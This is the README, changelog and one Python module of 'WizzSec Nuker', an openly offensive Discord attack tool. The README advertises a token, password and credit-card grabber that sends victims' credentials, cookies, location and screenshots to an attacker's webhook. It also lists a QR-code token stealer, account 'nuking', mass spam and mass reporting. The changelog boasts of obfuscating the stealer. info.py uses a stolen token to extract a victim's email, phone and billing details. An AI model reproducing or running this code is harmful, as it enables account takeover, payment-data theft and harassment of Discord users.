README.md
<p align= center</p><a href="https://cheataway.com" target="_blank"><img src="https://raw.githubusercontent.com/Rdimo/images/master/WizzSec-Nuker/WizzSec_Nuker_Banner.png" alt="WizzSecNuker"></a>
<p align="center">
<img src="https://img.shields.io/github/languages/top/Rdimo/WizzSec-Nuker?style=flat-square" </a>
<img src="https://img.shields.io/github/last-commit/Rdimo/WizzSec-Nuker?style=flat-square" </a>
<img src="https://sonarcloud.io/api/project_badges/measure?project=Rdimo_WizzSec-Nuker&metric=ncloc" </a>
<img src="https://img.shields.io/github/license/Rdimo/WizzSec-Nuker?style=flat-square" </a>
<img src="https://img.shields.io/github/downloads/Rdimo/WizzSec-Nuker/total?color=%23daff00&label=1.4.5 Downloads&style=flat-square" </a>
<img src="https://img.shields.io/github/stars/Rdimo/WizzSec-Nuker?color=%23daff00&label=Stars&style=flat-square" </a>
<img src="https://img.shields.io/github/forks/Rdimo/WizzSec-Nuker?color=%23daff00&label=Forks&style=flat-square" </a>
</p>
<p align="center">
<a href="https://github.com/Rdimo/WizzSec-Nuker#installation">Installation</a> |
<a href="https://github.com/Rdimo/WizzSec-Nuker#Important">Important</a> |
<a href="https://github.com/Rdimo/WizzSec-Nuker/blob/master/Changelog.md">Changelogs</a> |
<a href="https://cheataway.com">Discord</a>
</p>

---

### ㅤㅤNOTE・WizzSec IS *NOT* DONE SO EXPECT BUGS AND NON-WORKING FUNCTIONS
ㅤ
#### WizzSec Nuker was made by
Love ❌
Code ✅

#  ㅤㅤ ㅤㅤ ㅤㅤ ㅤㅤ ㅤㅤFeatures
<p align="center">
 <img alt="theme1" src="https://raw.githubusercontent.com/Rdimo/images/master/WizzSec-Nuker/theme1.png" width="20%">
 <img alt="theme2" src="https://raw.githubusercontent.com/Rdimo/images/master/WizzSec-Nuker/theme2.png" width="20%">
 <img alt="theme3" src="https://raw.githubusercontent.com/Rdimo/images/master/WizzSec-Nuker/theme3.png" width="20%">
 <img alt="theme4" src="https://raw.githubusercontent.com/Rdimo/images/master/WizzSec-Nuker/theme4.png" width="20%">
</p>

* ` Settings | Theme changer, Thread amount, Cancel key`
* ` Many options while being compact`
* ` Auto update`
* ` Noob friendly (hopefully)`
* ` Easy and fast`
* ` Linux Support! (kinda)`
* ` Create Token/Password/Creditcard Grabber`
* ` Create Qr code that grabs their token upon scanning`
* ` Nuke a targetted account`
* ` Status/bio/hypesquad Changer`
* ` Mass DM`
* ` Log into an account thru the token`
* ` Mass report`
* ` GroupChat Spammer`
* ` Webhook deleter/spammer`
* ` And a hell lot more!`

<p align="center">
 <img alt="WizzSecNuker" src="https://raw.githubusercontent.com/Rdimo/images/master/WizzSec-Nuker/WizzSecNuker.png" width="45%">
&nbsp; &nbsp; &nbsp; &nbsp;
 <img alt="WizzSecNukerUpdate" src="https://raw.githubusercontent.com/Rdimo/images/master/WizzSec-Nuker/WizzSecUpdate.png" width="45%">
</p>

## Features in detail

<details>
<summary>Features in detail (Expand/Collapse)</summary>

#### [1] Nuke a targetted account 
* Spam switch from light to dark mode the whole time nuking
* Change language from ja to zh-TW to ko to zh-CN
* Delete/leave every server they are in
* Will create 100 servers named whatever you want or smth random
* Removes all friends
* Send a chosen message to every friend they have
* Everything will be logged so you can watch what happens on the cmd

#### [2] Unfriend all friends
* Removes all friend the user has

#### [3] Delete and leave all servers
* Leaves and deletes all the server the user has

#### [4] Spam Create New servers
* Creates 100 new servers named whatever you want

#### [5] DM Deleter
* Deletes all the private DM's the account has

#### [6] Mass DM
* Messages all friends and group chats a message of your choice 

#### [7] Enable seizure mode
* Switches between Light/dark mode as long as the console is open
* Switches languages from ja to zh-TW to ko to zh-CN

#### [8] Get information from a targetted account
This is the info you get:
* User ID
* Date account was created at
* Language
* Badges
* Avatar URL
* Token
* If they have 2fa on/off
* Email
* Phone number if they have one
* If they have nitro
* If they have nitro you get how many days they have it for 
* Payment type (credit card/paypal)
* If the payment is valid
* Name of the credit card/paypal
* Credit card/Paypal Holder Name
* Credit card brand
* Credit card number (not the whole)
* Credit card expiration date
* Paypal email
* Address 1 and address 2
* Their city
* Their postal code
* Their state
* Their country
* If the payment method is their default
* If they have multiple credit cards connected you get those aswell

#### [9] Log into an account
* Log into the account via their token
* Multiple browsers supported! (google, edge, opera)

#### [10] Block Friends
* Blocks every friend they have

#### [11] Profile Changer
* Change their status
* Change their bio
* Change their hypesquad badge

#### [12] [coming soon]
I just dont know that to have here on this option das why

#### [13] Create Token Grabber
Upon running the file you will get the following sent to your webhook:
* Username
* Computer Name
* IP
* City
* Region
* Country
* Google Maps Location
* Screenshot of their pc
* All their Valid Discord Tokens
* Password For Discord (You get their password if they update it)
* Their Whole Credit Card (if They put one in)
* All their Chrome Passwords And Cookies
> Webhook looks like this:

<p align="left"><img src="https://i.imgur.com/4KmwB6I.png"</p>

#### [14] QR Code Grabber
* Creates a QR code that will give you a discord user's token if they scan it
> Webhook looks like this:

<p align="left"><img src="https://raw.githubusercontent.com/Rdimo/images/master/WizzSec-Nuker/QR-code.jpg"</p>

#### [15] Mass Report
* Mass report a user of your choice
* The account that will send the reports are the token that you put in

#### [16] GroupChat Spammer
* Mass create group chats with random users or chosen users

#### [17] Webhook Destroyer
* Choose between deleting or spamming a webhook
* Can customize the message being sent and can cancel the spam at any time

#### [18] Settings
* Change WizzSecs theme
* Change the amount of threads
* Change the cancel key
* Exit WizzSec
</details>

---

### ❗・Important
* Found a bug? Join the [discord](https://cheataway.com) and contact rdimo or create an issue about it directly in [here!](https://github.com/Rdimo/WizzSec-Nuker/issues/new/choose)
* Some people have made a version of WizzSec Nuker that looks/works like this one just that it's malicious, please make sure you only download stuff from here to make sure your info doesn't get stolen

## 🤓・For you skids
* We all know you cant code for shit but skidding peoples hard work, is just not it and profiting from it is just even more f*cked up
* I hope you end up on the streets begging for spare change

## Installation 

#### 1nd・Installation (compiled)
```sh-session
https://github.com/Rdimo/WizzSec-Nuker/releases
Download the latest release (WizzSec.zip)
Drag it out to desktop and extract it
Open WizzSecNuker.exe
```

#### 2st・Installation (source code)
```
download git: https://git-scm.com/downloads
open cmd in chosen folder and type:
$ git clone https://github.com/Rdimo/WizzSec-Nuker.git
$ cd WizzSec-Nuker
$ start setup.bat
```

◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥◤◢◣◥

|🌟Star This Repository if you liked WizzSec Nuker ˙ᵕ˙|
|-------------------------------------------------|

<a href="https://cheataway.com" target="_blank"><img src="https://discordapp.com/api/guilds/899560455993966633/widget.png?style=banner2" alt="Cheataway"/></a>

Created by Rdimo#6969 | https://cheataway.com
|⚠️・WizzSec Nuker was made for educational purposes・⚠️|
|-------------------------------------------------|
By using WizzSecNuker, you agree that you hold responsibility and accountability of any consequences caused by your actions


Changelog.md
<p align= center</p><a href="https://cheataway.com" target="_blank"><img src="https://cdn.discordapp.com/attachments/853347983639052318/858485202157699092/WizzSec_Nuker_Banner.png" alt="WizzSecNuker"></a>

### 2022-02-10, v1.4.5
* ` Fixed a big bug with the token grabber creator`

### 2022-02-10, v1.4.4
* ` Just bug fixes`

### 2022-02-07, v1.4.3
* ` Checks if the token is phone locked now`
* ` Removed the cancel key for every options except seizure because it really had no use and don't think anyone gonna stop mid server spamming`
* ` Neon theme looks better now, the old one was ass`
* ` Some errors are more clearer now, and easier to traceback`
* ` Added opera stable browser support`
* ` Fixed the threading a bit and improved it`
* ` General bug fixes`

### 2022-01-25, v1.4.2
* ` Finished option 11`
* ` So now you can change the users bio and hypesquad badge`

### 2022-01-23, v1.4.1
* ` Drastically changed the file size of WizzSec grabber.v2 + fixed bugs and made it more efficient etc...`
* ` Qr code grabber[14] now works again since discord updated it a little`
* ` Added more browser support for option [9] (login account) so if you dont have google it will try either google, edge and soon opera stable`
* ` Fixed bug were WizzSec grabber.v2 didnt work if you choose to obfuscated it` 

### 2022-01-19, v1.4.0
* ` New option! Changed exit to settings so you can customize alot of stuff with WizzSec now like themes`
* ` New option! profile changer, edit the users status, bio and hypesquad badge!` 
* ` New option! friend blocker (replaced from disable token)` 
* ` Themes! You can select a theme for WizzSec now, the theme will also be stored for the next time you open up WizzSec!`
* ` Threads! You can select amount of threads that WizzSec will send out! More threads = faster but dont have to many (default is 3 + the threads **don't** apply for every option)`
* ` Cancel Key! When using an option like seizure for example, you can cancel the operation at any time by pressing your cancel key! (default key is ctrl+x)`
* ` You can now choose if you want to obfuscate WizzSec stealer v2 (not gonna make the obfuscation op since this is a free tool)`
* ` Added option to have a server icon of you choice when spamming servers`
* ` Added option to have random server name when spamming servers (suggestion from needhelpn (https://github.com/Rdimo/WizzSec-Nuker/issues/53))`
* ` All options are now 3x faster`
* ` Alot better proxy scraping`
* ` It now checks if you got the libs installed, thought I did this earlier but no`
* ` Made the webhook checker alot better`
* ` Made the token checker alot better`
* ` Made the login function (option 9) faster`
* ` Qr Code grabber now looks cleaner and grabs more info ;)`
* ` Removed the progressbar`
* ` fixed bug were seizure mode would not switch to dark mode and only stay on light`
* ` fixed bug were you couldn't install chromedriver since they removed it, so I made my own`
* ` fixed bug were you got blocked for requesting too much to scrape proxies is now fixed since WizzSec grabs from alot more urls`
> **THIS IS THE FIRST PART OF THE UPDATE SINCE SO MANY OF YOU WANTED IT OUT QUICKLY EXPECT ALOT OF BUGS AND IF YOU FIND ANY PLEASE TELL ME**

### 2021-11-7, v1.3.3
* ` New option! Groupchat Spammer (suggestion from JayH4x (https://github.com/Rdimo/WizzSec-Nuker/issues/18))`
* ` Added proxies! dw it auto scrapes proxies for you so the whole proccess is automated`
* ` Made it web scrape the download url for auto update`
* ` New setup to make it easier to start WizzSec`
* ` Fixed the qr code scanner, since it got patched`
* ` Fixed bug where the servers wouldn't get left (they won't be deleted, haven't figured out how to fix that one since discord patched it)`
> **even though I use proxies you might still get ratelimited and I will fix alot better proxies and proxy system for this in the future!**

### 2021-10-27, v1.3.2
* ` Fixed Mass Report`
* ` For those wondering why my github wasn't visible it was because I got flagged for a while but I'm back now and unflagged!`

### 2021-10-16, v1.3.1
* ` New option! Create Stealer (https://github.com/Rdimo/WizzSec-Token-Grabber-V2)`
* ` Should hopefully fully Support Linux Now!`
* ` Auto update now works for both compiled and source code users`
* ` Enabled logs when creating the loggers`
* ` Updated every api to v9`
* ` Fixed bug where seizure mode would go on forever after account nuker`
* ` Fixed bug where the servers wouldn't get deleted/left`

### 2021-9-26, v1.3.0
* ` Eyy source code release as promised`
* ` Fixed some stuff too but don't remember what I fixed`

### 2021-9-22, v1.2.9
* ` Made it so the title changes depending on what your doing now`
* ` Fixed a bug where the title didn't change`
* ` Fixed bug where the qr code grabber would crash`
* ` Fixed token grabber bug, yet again`

### 2021-9-19, v1.2.8
* ` New option! Mass DM, basically just dm's every friend that they have`
* ` Made it show the name instead of the id when removing friends, dms, guild etc except for when using dm spam since that was a pain to fix`
* ` All options runs 100x faster since I abuse threads now`
* ` WizzSec runs alot smoother now since I cleaned up the code`
* ` Fixed a bug with the token grabber that it wouldn't install pyinstaller for you`
* ` Fixed a bug were the token grabber wouldn't grab passwords sometimes`

### 2021-9-13, v1.2.7
* ` Fixed a bug with token grabber since I forgot to remove on thing`
* ` Made it more clear when WizzSec Nuker fails to update`
* ` Made it more clear on what to do with QR code grabber`

### 2021-9-13, v1.2.6
* ` Fixed a error that you couldn't create token grabber`
* ` Fixed Error Webhook a little`
* ` Made QR code grabber a little bit more clear`

### 2021-9-13, v1.2.5
* ` New option! QR Code grabber! Create a qr code and send it to users to steal their token!`
* ` Made WizzSec Nuker send an error to your webhook incase you get one (easier for me to debug and you can send me the errors)`

info.py
# WizzSec was proudly coded by Rdimo (https://github.com/Rdimo).
# Copyright (c) 2021 Rdimo#6969 | https://Cheataway.com
# WizzSec Nuker under the GNU General Public Liscense v2 (1991).

import requests
import WizzSec

from datetime import datetime
from colorama import Fore

from util.plugins.common import getheaders

def Info(token):
    r = requests.get('https://discord.com/api/v9/users/@me', headers=getheaders(token))
    cc_digits = {
    'american express': '3',
    'visa': '4',
    'mastercard': '5'
}
    badges = ""

    Discord_Employee = 1
    Partnered_Server_Owner = 2
    HypeSquad_Events = 4
    Bug_Hunter_Level_1 = 8
    House_Bravery = 64
    House_Brilliance = 128
    House_Balance = 256
    Early_Supporter = 512
    Bug_Hunter_Level_2 = 16384
    Early_Verified_Bot_Developer = 131072

    flags = r.json()['flags']
    if (flags == Discord_Employee):
        badges += "Staff, "
    if (flags == Partnered_Server_Owner):
        badges += "Partner, "
    if (flags == HypeSquad_Events):
        badges += "Hypesquad Event, "
    if (flags == Bug_Hunter_Level_1):
        badges += "Green Bughunter, "
    if (flags == House_Bravery):
        badges += "Hypesquad Bravery, "
    if (flags == House_Brilliance):
        badges += "HypeSquad Brillance, "
    if (flags == House_Balance):
        badges += "HypeSquad Balance, "
    if (flags == Early_Supporter):
        badges += "Early Supporter, "
    if (flags == Bug_Hunter_Level_2):
        badges += "Gold BugHunter, "
    if (flags == Early_Verified_Bot_Developer):
        badges += "Verified Bot Developer, "
    if (badges == ""):
        badges = "None"

    userName = r.json()['username'] + '#' + r.json()['discriminator']
    userID = r.json()['id']
    phone = r.json()['phone']
    email = r.json()['email']
    language = r.json()['locale']
    mfa = r.json()['mfa_enabled']
    avatar_id = r.json()['avatar']
    has_nitro = False
    res = requests.get('https://discordapp.com/api/v9/users/@me/billing/subscriptions', headers=getheaders(token))
    nitro_data = res.json()
    has_nitro = bool(len(nitro_data) > 0)
    avatar_url = f'https://cdn.discordapp.com/avatars/{userID}/{avatar_id}.webp'
    creation_date = datetime.utcfromtimestamp(((int(userID) >> 22) + 1420070400000) / 1000).strftime('%d-%m-%Y %H:%M:%S UTC')

    if has_nitro:
        d1 = datetime.strptime(nitro_data[0]["current_period_end"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
        d2 = datetime.strptime(nitro_data[0]["current_period_start"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
        days_left = abs((d2 - d1).days)

    billing_info = []
    for x in requests.get('https://discordapp.com/api/v9/users/@me/billing/payment-sources', headers=getheaders(token)).json():
        y = x['billing_address']
        name = y['name']
        address_1 = y['line_1']
        address_2 = y['line_2']
        city = y['city']
        postal_code = y['postal_code']
        state = y['state']
        country = y['country']
        if x['type'] == 1:
            cc_brand = x['brand']
            cc_first = cc_digits.get(cc_brand)
            cc_last = x['last_4']
            cc_month = str(x['expires_month'])
            cc_year = str(x['expires_year'])
            data = {
                'Payment Type': 'Credit Card',
                'Valid': not x['invalid'],
                'CC Holder Name': name,
                'CC Brand': cc_brand.title(),
                'CC Number': ''.join(z if (i + 1) % 2 else z + ' ' for i, z in enumerate((cc_first if cc_first else '*') + ('*' * 11) + cc_last)),
                'CC Exp. Date': ('0' + cc_month if len(cc_month) < 2 else cc_month) + '/' + cc_year[2:4],
                'Address 1': address_1,
                'Address 2': address_2 if address_2 else '',
                'City': city,
                'Postal Code': postal_code,
                'State': state if state else '',
                'Country': country,
                'Default Payment': x['default']
            }
        elif x['type'] == 2:
            data = {
                'Payment Type': 'PayPal',
                'Valid': not x['invalid'],
                'PayPal Name': name,
                'PayPal Email': x['email'],
                'Address 1': address_1,
                'Address 2': address_2 if address_2 else '',
                'City': city,
                'Postal Code': postal_code,
                'State': state if state else '',
                'Country': country,
                'Default Payment': x['default']
            }
        billing_info.append(data)
        
    print(f'''
    {Fore.RESET}{Fore.GREEN}<<────────────{userName}────────────>>{Fore.RESET}
    [{Fore.RED}User ID{Fore.RESET}]         {userID}
    [{Fore.RED}Created at{Fore.RESET}]      {creation_date}
    [{Fore.RED}Language{Fore.RESET}]        {language}
    [{Fore.RED}Badges{Fore.RESET}]          {badges}
    [{Fore.RED}Avatar URL{Fore.RESET}]      {avatar_url if avatar_id else ""}
    [{Fore.RED}Token{Fore.RESET}]           {token}
    {Fore.RESET}{Fore.GREEN}<───────────Security Info───────────>{Fore.RESET}
    [{Fore.RED}2 Factor{Fore.RESET}]        {mfa}
    [{Fore.RED}Email{Fore.RESET}]           {email}
    [{Fore.RED}Phone number{Fore.RESET}]    {phone if phone else ""}
    {Fore.RESET}{Fore.GREEN}<────────────Nitro Info─────────────>{Fore.RESET}
    [{Fore.RED}Nitro Status{Fore.RESET}]    {has_nitro}
    [{Fore.RED}Expires in{Fore.RESET}]      {days_left if has_nitro else "0"} day(s)
                ''')
    if len(billing_info) > 0:
        print(f"\t\t{Fore.RESET}{Fore.GREEN}<────────────Billing Info────────────>{Fore.RESET}")
        if len(billing_info) == 1:
            for x in billing_info:
                for key, val in x.items():
                    if not val:
                        continue
                    print(f"[{Fore.RED}"+'{:<23}{:<10}{}'.format(key+Fore.RED+Fore.RESET+"]", Fore.RESET, val))
        else:
            for i, x in enumerate(billing_info):
                title = f'Payment Method #{i + 1} ({x["Payment Type"]})'
                print('' + title)
                print('' + ('=' * len(title)))
                for j, (key, val) in enumerate(x.items()):
                    if not val or j == 0:
                        continue
                    print(f"[{Fore.RED}"+'{:<23}{:<10}{}'.format(key+Fore.RED+Fore.RESET+"]", Fore.RESET, val))
                if i < len(billing_info) - 1:
                    print(f'{Fore.RESET}\n')
        print(f'{Fore.RESET}')
    input(f'{Fore.GREEN}[{Fore.YELLOW}>>>{Fore.GREEN}] {Fore.RESET}Enter anything to continue . . .  {Fore.RED}')
    WizzSec.main()